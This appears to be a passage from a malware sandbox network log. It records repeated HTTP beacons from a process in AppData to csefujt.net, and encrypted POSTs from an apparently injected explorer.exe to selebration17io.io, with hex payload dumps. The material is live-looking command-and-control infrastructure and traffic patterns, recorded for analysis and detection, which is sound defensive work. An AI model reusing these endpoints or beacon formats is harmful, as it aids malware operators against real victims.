                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                101192.168.2.649843185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:30.338670969 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:30.583293915 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                102192.168.2.649844185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:30.977087975 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:31.219779968 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                103192.168.2.649845185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:31.588088036 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:31.824461937 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                104192.168.2.64984691.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:31.889816046 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://fckyfgpcdvk.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 304
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:31.889862061 CET304OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8e b3 3f d6
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO?02*lyd*}aXegzHnF.*"])b-U.\6;$Gswd)G1Zr7E\2W'1j6%?{?
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:32.142455101 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                105192.168.2.649847185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:32.169811964 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:32.413049936 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                106192.168.2.649848185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:32.760178089 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:32.996984005 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                107192.168.2.649849185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:33.355777979 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:33.600907087 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:33 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                108192.168.2.649850185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:33.977843046 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:34.220473051 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:34 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                109192.168.2.649851185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:34.581547976 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:34.818738937 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:34 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                110192.168.2.64985291.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.158407927 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://hkijxgsqrcqnlfn.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 299
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.158482075 CET299OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 aa a6 3b c8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO;"$M^bmxx>WrE`jl/a.H,;1/e# `iy?olv{#x!hbB1_xf8mfFFr}{+8Zq
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.416320086 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                111192.168.2.649853185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.162345886 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.408040047 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                112192.168.2.649854185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.753498077 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:35.990385056 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                113192.168.2.649855185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:36.326859951 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:36.569446087 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                114192.168.2.649856185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:36.920476913 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:37.164222956 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:37 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                115192.168.2.649857185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:37.544146061 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:37.780312061 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:37 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                116192.168.2.649858185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:38.140150070 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:38.383191109 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:38 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                117192.168.2.649859185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
